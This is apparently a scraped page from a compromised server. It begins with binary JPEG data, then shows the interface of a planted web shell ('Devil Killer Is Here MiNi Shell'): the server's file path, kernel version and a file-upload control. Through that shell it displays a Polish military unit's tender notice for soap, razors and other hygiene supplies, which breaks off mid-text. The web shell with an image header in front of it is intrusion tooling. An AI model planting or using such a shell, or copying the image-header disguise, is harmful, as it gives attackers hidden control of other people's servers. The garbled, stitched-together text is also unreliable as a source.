JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20241025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20241025/0056417401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa środków i artykułów higieny osobistej w 2025 r. - 99/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">13 WOJSKOWY ODDZIAŁ GOSPODARCZY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 340907277</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Czwartaków 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grudziądz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261483290</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">261483222</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">13wog.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.13wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa środków i artykułów higieny osobistej w 2025 r. - 99/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dc4c73d1-6477-421d-9886-fb7288d4aa84</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00564174</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1004574 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1004574</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">►Zgodnie z art. 61. ust. 1. oraz art. 63 ust. 2 ustawy Prawo Zamówień Publicznych z dnia 11 września 2019 r. komunikacja w niniejszym postępowaniu odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej.<br/>►Dokumenty, oświadczenia składa się pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym - przez osoby uprawnione do składania oświadczeń woli ze skutkiem zaciągania zobowiązań w imieniu Wykonawcy.<br/>►Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452) oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz.U. z 2020 r., poz. 2415).<br/>►Za datę przekazania dokumentów oraz innych informacji w sprawie za pomocą platformy zakupowej, przyjmuje się datę ich przesłania za pośrednictwem platformy zakupowej i pojawieniu się komunikatu o wysłaniu wiadomości do Zamawiającego.<br/>►Wszelkie instrukcje dotyczące korzystania z platformy zakupowej w toku postępowania oraz innych czynności podejmowanych w prowadzonym postępowaniu są dostępne pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>► Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>►W przypadku pytań technicznych, zaleca się bezpośredni kontakt z: Centrum Wsparcia Klienta platformazakupowa.pl - tel: 22/ 1010202 oraz e-mail: cwk@platformazakupowa.p<br/>► Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>►Zamawiający dopuszcza formaty przesyłanych danych zgodne z Obwieszczeniem Prezesa Rady Ministrów z dnia 09 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, w szczególności zalecając następujący format przesyłanych danych: pdf, doc, docx, xls, xlsx, jpg, (.jpeg) ze szczególnym wskazaniem na pdf.<br/>►Dopuszcza się w przypadkach wystąpienia awarii systemu np. braku działania platformy zakupowej kontakt e-mail: 13wog.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">►Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>►Administratorem danych osobowych przetwarzanych w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego jest 13 Wojskowy Oddział Gospodarczy;<br/>► w sprawach związanych z danymi należy kontaktować się z Inspektorem Ochrony Danych - p. Moniką Kurzawa, poprzez e-mail: 13wog.iodo@ron.mil.pl lub kontakt pisemny za pomocą poczty tradycyjnej na adres 13 WOG – ul. Czwartaków 3, 86-300 Grudziądz;<br/>►dane osobowe wynikające ze złożonych dokumentów, przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem postępowania o udzielenie zamówienia publicznego, zawarciem umowy i jej realizacją, dochodzeniem ewentualnych roszczeń, podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych po stronie Zamawiającego;<br/>►odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy p.z.p., oraz podmiotom / osobom w zakresie procesu i zarządzania 13WOG w tym dostawcom usług teleinformatycznych, księgowych, prawnych, doradczych, kurierskich i pocztowych, archiwizacyjnych, związanych z utylizacją dokumentacji oraz innych nośników zawierających dane osobowe, pracownikom i współpracownikom, którzy muszą mieć dostęp do danych aby wykonywać swoje obowiązki służbowe;<br/>►dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy p.z.p. oraz przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach, w związku z Jednolitym Rzeczowym Wykazem Akt 13 WOG, przez okres 5 lat od dnia udzielenia zamówienia, przez czas trwania umowy, okres gwarancji oraz czas na dochodzenie ewentualnych roszczeń, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>►obowiązek podania danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym określonym w przepisach ustawy p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy p.z.p. m.in. dotyczą uniemożliwienia przeprowadzenia postępowania z udziałem podmiotu, który nie dopełnił wymagań o których mowa lub niemożliwością zawarcia z nim umowy z przyczyn leżących po jego stronie.<br/>►Zamawiający wskazuje, że Wykonawca jest zobowiązany do realizacji obowiązku informacyjnego wynikającego z art. 13 lub / i art. 14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu w związku z prowadzonym postępowaniem i których dane Zamawiający pośrednio pozyskał / pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">►Udostępniający / wskazujący dane osobowe po stronie Wykonawcy, ma prawo: na podstawie art. 15 RODO prawo dostępu do danych osobowych odpowiednio osoby dotyczącej; na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą p.z.p. oraz nie może naruszać integralności protokołu oraz jego załączników; na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego; prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznane zostanie, że przetwarzanie danych osobowych odpowiednio dotyczących narusza przepisy RODO.<br/>►Udostępniającemu / wskazującemu dane osobowe po stronie Wykonawcy, nie przysługuje: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">99/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ►Przedmiotem zamówienia jest jednorazowa dostawa środków higieny zgodnie ze wskazanymi przez Zamawiającego normami oraz asortymentem, ilościami oraz wymaganiami określonymi oraz zgodnie z warunkami wyszczególnionymi Projektowanych warunkach Umowy w terminie do 30 dni kalendarzowych od dnia 06.01.2025 r. dla zakresu podstawowego.<br/>►Zakres podstawowy podmiot zamówienia:<br/>Mydło toaletowe (100g) - 10 000 szt.;<br/>Pasta do mycia rąk (500g) - 2 000 szt.;<br/>Krem do rąk (50ml) - 2 000 szt.;<br/>Pasta do obuwia (40g) - 1 000 szt.;<br/>Pasta do obuwia w płynie (60ml) - 500 szt.;<br/>Pianka do golenia (200ml) - 500 szt.;<br/>Maszynka jednorazowa do golenia - 2 000 szt.;<br/>Pasta do zębów (75ml) - 1 000 szt.;<br/>Impregnat do obuwia specjalnego (125 ml) - 500 szt.<br/>►Miejsce dostawy: magazyn służby mundurowej, 13 Wojskowy Oddział Gospodarczy, ul. Legionów 54, budynek nr 26, 86-300 Grudziądz.<br/>►Wymagania ogólne dla oferowanego przedmiotu zamówienia:<br/>1) Oferowany produkt powinien być fabrycznie nowy, bez znamion użytkowania oraz być pełnowartościowy, kompletny w pierwszej kategorii. Ponadto powinien spełniać wymagania jakościowe i właściwości określone przez Zamawiającego oraz producenta danego wyrobu oraz gwarantować funkcjonalność i niezawodność wykorzystania w zakresie swego przeznaczenia.<br/>2) Przedmiot zamówienia w danej pozycji asortymentowej dostarczony do Zamawiającego winien być jednakowy tj. o takich samych uwarunkowaniach technicznych, właściwościach fizyko-chemicznych zarówno w zakresie podstawowym jak i opcjonalnym.<br/>3) Przedmiot zamówienia musi być dostarczony w oryginalnym, nienaruszonym opakowaniu producenta danego wyrobu, w sposób zapewniający zachowanie jego właściwości podczas transportu i przechowywania w warunkach magazynowych.<br/>4) Wykonawca powinien dostarczyć przedmiot zamówienia zgodny z określonymi przez Zamawiającymi parametrami.<br/>5) Wykonawca zobowiązany jest na własny koszt dostarczyć, rozładować, zapewnić wniesienie dostarczonych produktów do pomieszczenia wskazanego przez pracownika Zamawiającego, po uprzednim zawiadomieniu Zamawiającego o terminie dostawy.<br/>6) Wykonawca zabezpieczy należycie towar na czas przewozu i ponosi całkowitą odpowiedzialność za dostawę i jakość przedmiotu zamówienia do czasu protokolarnego odbioru przedmiotu zamówienia. <br/>7) Przedmiot zamówienia powinien być wyprodukowany najwcześniej w 2024 roku.<br/>8) Produkty powinny posiadać kod kreskowy EAN-8 (osiem cyfr) dla wyrobów detalicznych o bardzo małych gabarytach w opakowaniu producenta, gdzie kod kreskowy jest umieszczony na etykiecie spinającej wyrób lub EAN-13 (trzynaście cyfr) dla wyrobów detalicznych o małych gabarytach w opakowaniu producenta, gdzie kod kreskowy jest umieszczony na wyrobie, opakowaniu.<br/>9) Wyroby powinny posiadać kod kreskowy ITF-14 (czternaście cyfr) dla wyrobów umieszczanych w opakowaniach zbiorczych zawierających stałą ilość przedmiotów tego samego rodzaju, wzoru i rozmiaru.<br/>►Zakazuje się dokonywania podczas realizacji zamówienia, zdjęć, nagrań, zbierania danych z wykorzystywaniem aparatów latających, w tym BSP typu „Dron”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33711900-6 - Mydło</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33741100-7 - Środek do mycia rąk</p> <p class="mb-0">39812200-9 - Pasty do butów</p> <p class="mb-0">33711800-5 - Preparaty do golenia</p> <p class="mb-0">33721200-2 - Maszynki do golenia</p> <p class="mb-0">33711720-0 - Pasta do zębów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ►Zamawiający przewiduje możliwość skorzystania z prawa opcji określonego w art. 441 ustawy Pzp (prawo opcji). <br/>►Realizacja prawa opcji polegać będzie na zwiększeniu podstawowego zakresu ilościowego przedmiotu zamówienia o ilości wynikające z uzasadnionych potrzeb Zamawiającego, w sytuacjach określonych poniżej, z zastrzeżeniem nieprzewyższenia maksymalnej ilości opcji, określonej w postanowieniach umowy.<br/>Zasady realizacji przez Zamawiającego „opcji” oraz warunki są takie same jak dla zamówień realizowanych dla zakresu podstawowego umowy.<br/>►Zamawiający zastrzega, iż ilości określone poniżej są orientacyjne szacunkowe co oznacza, iż w zakresie realizacji prawa opcji Zamawiający może zamówić jeden, kilka lub wszystkie produkty w ilościach, na które jest zapotrzebowanie. <br/>►Zakres opcjonalny podmiot zamówienia:<br/>Mydło toaletowe (100g) - 10 000 szt.;<br/>Pasta do mycia rąk (500g) - 2 000 szt.;<br/>Krem do rąk (50ml) - 2 000 szt.;<br/>Pasta do obuwia (40g) - 1 000 szt.;<br/>Pasta do obuwia w płynie (60ml) - 500 szt.;<br/>Pianka do golenia (200ml) - 500 szt.;<br/>Maszynka jednorazowa do golenia - 1 000 szt.;<br/>Pasta do zębów (75ml) - 1 000 szt.;<br/>Impregnat do obuwia specjalnego (125 ml) - 500 szt.<br/>►Zamawiający w przypadku skorzystania z prawa opcji nie jest zobowiązany w jej ramach do zamawiania każdego asortymentu składającego się na przedmiot umowy. Przedmiot zamówienia każdorazowo będzie określony potrzebami Zamawiającego, które są w pełni uzależnione od aktualnych nieprzewidzianych przedsięwzięć i potrzeb oraz posiadanych środków finansowych.<br/>►Powyższe oznacza, iż Zamawiający może zrealizować zamówienia w zwiększonych lub zmniejszonych ilościach poszczególnych produktów niż ustalone powyżej, jak i Zamawiający może nie wykorzystać poszczególnych produktów w ogóle. Zamówienia wynikające z prawa opcji będą realizowane w ramach ustalonej w umowie ilości opcji. Wartość opcji jest maksymalną wartością jaką może zapłacić Zamawiający za realizację zamówień.<br/>Granicą realizacji opcji będzie jej maksymalna wartość określona w postanowieniach umowy.<br/>►Opcja będzie miała zastosowanie w sytuacjach niemożliwych do przewidzenia w dniu zawarcia umowy, spowodowanych w szczególności nieprzewidzianymi przedsięwzięciami, ale niemożliwymi do określenia co do ilości wcielanych do służby żołnierzy i zatrudnianych pracowników, które nie są znane ani prognozowane na obecnym etapie wszczynanego postępowania. <br/>►Ceny jednostkowe dla zakresu opcji są tożsame odpowiednio dla poszczególnych przedmiotów jak dla zakresu podstawowego.<br/>►Termin realizacji zamówienia w ramach opcji wynosi 7 dni kalendarzowych od dnia otrzymania zamówienia przez Wykonawcę, z zastrzeżeniem, ze ostatnie zamówienie zostanie złożone Wykonawcy nie później niż na 7 dni kalendarzowych przed upływem terminu obowiązywania umowy (tj. 150-stu dni kalendarzowych od dnia zawarcia umowy). <br/>►Zastosowanie Zamawiającego z opcji nie wymaga aneksu, realizacja przez Zamawiającego prawa opcji nie stanowi zmiany umowy.<br/>►Zamawiający zastrzega, że realizacja zamówień w ramach „opcji” jest uprawnieniem Zamawiającego a nie bezwzględnym zobowiązaniem. Brak realizacji zamówień w ramach „opcji” nie będzie rodzić po stronie Zamawiającego żadnych roszczeń ze strony Wykonawcy w stosunku do Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy nie podlegającemu wykluczeniu, którego oferta uzyska największą liczbę punktów i jednocześnie spełni wszystkie wymagania przedmiotowe określone w prowadzonym postępowaniu o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ►Przedmiotem zamówienia jest jednorazowa dostawa artykułów higieny osobistej 